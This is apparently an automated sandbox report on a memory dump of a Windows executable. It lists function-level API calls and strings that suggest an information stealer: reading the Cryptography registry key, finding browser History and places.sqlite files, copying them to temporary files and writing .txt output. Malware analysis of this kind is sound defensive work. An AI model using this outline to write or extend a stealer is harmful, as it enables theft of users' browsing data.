Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileString$AllocCloseCreateFreeHandleWrite
String ID:
API String ID: 4097030272-0
Opcode ID: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
Instruction ID: 3b510cbaec4aa3dd23b0a59a32c8df0f07f2b1188254ef1f4a9bf23c6d4a84f0
Opcode Fuzzy Hash: 96112cf46e63d2d263f6c586123e846ce9d1e06681dd97ffb7b674c20077b506
Instruction Fuzzy Hash: 4311EC70A04208BBD711EB65CC82F9EBBACEB48704F504076B914F72D1DA746E048A58

Function 004013EC Relevance: 3.8, APIs: 3, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 0040140A
VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 0040142F
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0041C5E4,?,?,?,00401758), ref: 00401455

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Free
String ID:
API String ID: 3668210933-0
Opcode ID: d0f7f9bf85a63e2073a0b0aba1efbedd90cc19d60285e6920d01ae654114abd6
Instruction ID: 45c7259c7c7f7a53f47d7ebf7c15b413a2e3392a3d77efebc7c94e45ea16ea77
Opcode Fuzzy Hash: d0f7f9bf85a63e2073a0b0aba1efbedd90cc19d60285e6920d01ae654114abd6
Instruction Fuzzy Hash: 93F0C8B17403206ADB319A294C85F537AD49B4A764F144176BB08FF3DAD675580086AC

Function 00417094 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00417170,?,-00000001,0041B0FC,?,?,0041746F,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8), ref: 004170D6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

UTC+, xrefs: 00417105

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeInformationStringTimeZone
String ID: UTC+
API String ID: 3683333525-3251258214
Opcode ID: 1046955f6ff4cd58d7fbe5d7b9ecbab25abad90a7201c39de0429cb196e3f3e3
Instruction ID: 7cb0a8ca1bf39953f010b15065abca6362deebc9d482a7f0187c0908cc86bad5
Opcode Fuzzy Hash: 1046955f6ff4cd58d7fbe5d7b9ecbab25abad90a7201c39de0429cb196e3f3e3
Instruction Fuzzy Hash: A8215E747087145FDB55DB298C41B99B6FAAB8D300F1181FAB80CE3391D7389E458A15

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00404101

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 2525500382-1514646153
Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AllocOpenQueryStringValue
String ID:
API String ID: 4139485348-0
Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5

Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58registryCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5

Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Function 0040AA84 Relevance: 1.7, APIs: 1, Instructions: 187registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00000001,?,00000000,0040ACA6,?,00000000,0041B0FC,0041A69E), ref: 0040AAE6

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9abfc9f75ffebf2721150bd6bd5fbed50a976a6d9049e49e92d871bcf2c9e187
Instruction ID: ac4e7d83220bd21fd8c6f333f1e90c0bbcc0354ed1def0e792b3592e4231717e
Opcode Fuzzy Hash: 9abfc9f75ffebf2721150bd6bd5fbed50a976a6d9049e49e92d871bcf2c9e187
Instruction Fuzzy Hash: 6C71B2B5A00209AFDB10DF99C981EDEB7F8FB48304F504076EA14F7291DB74AE458B99

Function 0040A4DC Relevance: 1.6, APIs: 1, Instructions: 111comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040A502

Part of subcall function 0040A4A4: CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstance
String ID:
API String ID: 3519745914-0
Opcode ID: c7146c2ee00f13a8b070a8ef55d32a8a45292622e180b4121028d47487a371b6
Instruction ID: c08489ea19e13a3d293aecad3beeb391bbc31764778729df2f545245553e63cd
Opcode Fuzzy Hash: c7146c2ee00f13a8b070a8ef55d32a8a45292622e180b4121028d47487a371b6
Instruction Fuzzy Hash: 214161B1A00108AFD704EBA9DC41A9EB7F9EF84304F108076F504E72D1DB789E158B59

Function 0040AA76 Relevance: 1.6, APIs: 1, Instructions: 94registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00000001,?,00000000,0040ACA6,?,00000000,0041B0FC,0041A69E), ref: 0040AAE6

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 26e9b220453cdd747fbd0b884b51338cafa01c5462963c211927f6101c81a63b
Instruction ID: 0eb56dbbdedde93dc071919128606212d987d339c996090b4d76d4a19de309ed
Opcode Fuzzy Hash: 26e9b220453cdd747fbd0b884b51338cafa01c5462963c211927f6101c81a63b
Instruction Fuzzy Hash: 9531D971A00209AFDB10DF99CD81A9EBBF8FB48304F50447AE514F7291D778AA16CB59

Function 0040A472 Relevance: 1.6, APIs: 1, Instructions: 68comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040A502

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 05b4f67209cf29e7d51d4614d9afd77ff3a583cddf87dd53ddac2bdeb3cfee06
Instruction ID: 4128eab0078b9220c17e66a8506c051661ff3a85d7cfe1dd90edc884f7a1437e
Opcode Fuzzy Hash: 05b4f67209cf29e7d51d4614d9afd77ff3a583cddf87dd53ddac2bdeb3cfee06
Instruction Fuzzy Hash: 8521BEB1600248AFD300DBA4D841B9D7BB8EF44304F1140B7F500EB2E2DBB9AE15CB1A

Function 004076B0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

GetFileAttributesW.KERNEL32(00000000,00000000,004076FC,?,0041C7BC,?,?,004083F8,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781), ref: 004076DE

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: String$AllocAttributesFileFree
String ID:
API String ID: 2634384563-0
Opcode ID: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
Instruction ID: a7f0668d61e2dec431e32046e2844a6437fd6a4f389a52c14dd3b7fa7bab2667
Opcode Fuzzy Hash: 4a55e6a7ccd81ca30525239ac909850159b087d308325e78fb273df2937a63e3
Instruction Fuzzy Hash: A8F03074514608EFD701EB69CC5289EBBFCEB497647A1057AF410E35D1EB38BE00D568

Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Function 00403B58 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403B5F

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 910dd29793ec8a5ceaf1035511d9dc783a106504b7dd8afe82433608cd4bcd15
Instruction ID: bea8321bd29b1b0cb3959915f15724c359703e68ceae1f32cab0dcb1509c9ee6
Opcode Fuzzy Hash: 910dd29793ec8a5ceaf1035511d9dc783a106504b7dd8afe82433608cd4bcd15
Instruction Fuzzy Hash: 9FB0123460820111FA143D720E01B331C5C0B50B4BF880037AD21F51C3DD7DE901503E

Function 00403B70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00403B77

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
Instruction ID: 1013a877abc153affaca16d078552d4a9b2fa22a8452acd7ddfc898bd50da8eb
Opcode Fuzzy Hash: d497d8846639aaf179110225e0e01da4904a3c484c5354391378440b3d8208c6
Instruction Fuzzy Hash: A6A011A800020288CB0A3A2A00008232A3AAFC8308388C0BEA2002A2A28A3E88008028

Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Function 0040151C Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401589

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89

Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Function 00407268 Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000000FF,0040726A), ref: 00407260

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0de396ab8b4ab150699db8875a7c94bc97bb79a2768214bb77f2aee91b859061
Instruction ID: be2e1885d1cd6db3023e413391b9ef5afbaac7d1908e8d38cf697eb1b5ccea9a
Opcode Fuzzy Hash: 0de396ab8b4ab150699db8875a7c94bc97bb79a2768214bb77f2aee91b859061
Instruction Fuzzy Hash: 74B01270B04000EFCB00DBACC880D5973F5EB8C30071040A1B814E3220CB30BD009F1B

Non-executed Functions

Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF
.txt, xrefs: 00412F18

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction ID: 31102d54a49b3a600332046a535115537665bbef1f46384b784085fa532e6d73
Opcode Fuzzy Hash: 60f1aed37e2e99f440532b90469936e73ba5a5dec6828e4ede608866b0779c33
Instruction Fuzzy Hash: 61516C70909259AFCB12EB61CC45BDDBB78EF45304F2041EBA508F7192DA789F898B19

Function 00412D9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 141fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF
.txt, xrefs: 00412F18

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
Opcode ID: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction ID: 28420ec06a4cf3b7f255eec712baa8d4c4073a44f08a77f37e2c3042b4162f15
Opcode Fuzzy Hash: 9e1fdcc0da242b739753036d29313186668cc0af82581ab44d3f55cd16266d53
Instruction Fuzzy Hash: 7C515D74904219ABDF10EF51CD45BCDBBB9EF48304F6041FAA508B2291DA789F958F18

Function 0041303C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 139fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00413276,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,00413E3A,00000000,00000000), ref: 004130A8

Strings

.txt, xrefs: 004131AE
\*.*, xrefs: 0041308F
\places.sqlite, xrefs: 00413144

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\places.sqlite
API String ID: 1974802433-3919338718
Opcode ID: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction ID: 8aac54383f65123cc0eb0a4bac2364391818e056087fcce0e0ee32974804bc60
Opcode Fuzzy Hash: 57caf48ab4afc0b1baef0746783f85f9fbf3cd85722ed1048bbcffe4d93a662f
Instruction Fuzzy Hash: CB513A74904119ABDF10EF61CC45BCDBBB9EF44305F6081FAA508B3291DA39AF858F18

Function 00404C15 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404C7B
GetVersion.KERNEL32 ref: 00404C8F
GetVersion.KERNEL32 ref: 00404CA0
GetCurrentThreadId.KERNEL32 ref: 00404CDC

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404CBC

Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID:
API String ID: 3734044017-0
Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE

Function 004111C4 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 201fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,004118A0,00000000,00000000,00412524), ref: 0041122F

Part of subcall function 00410E70: GetTickCount.KERNEL32 ref: 00410EB4
Part of subcall function 00410E70: CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

FindNextFileW.KERNEL32(?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000,00000000), ref: 00411495
FindClose.KERNEL32(?,?,?,?,0041156C,?,0041156C,0041A69E,00000000,?,00000000,00411542,?,00000000,0041B0FC,00000000), ref: 004114A6

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

.txt, xrefs: 00411355, 00411444
\*.*, xrefs: 00411216

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
String ID: .txt$\*.*
API String ID: 4269597168-2615687548
Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58

Function 0041158C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

\*.*, xrefs: 004115E2
.txt, xrefs: 00411717

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstFreeNextString
String ID: .txt$\*.*
API String ID: 2008072091-2615687548
Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
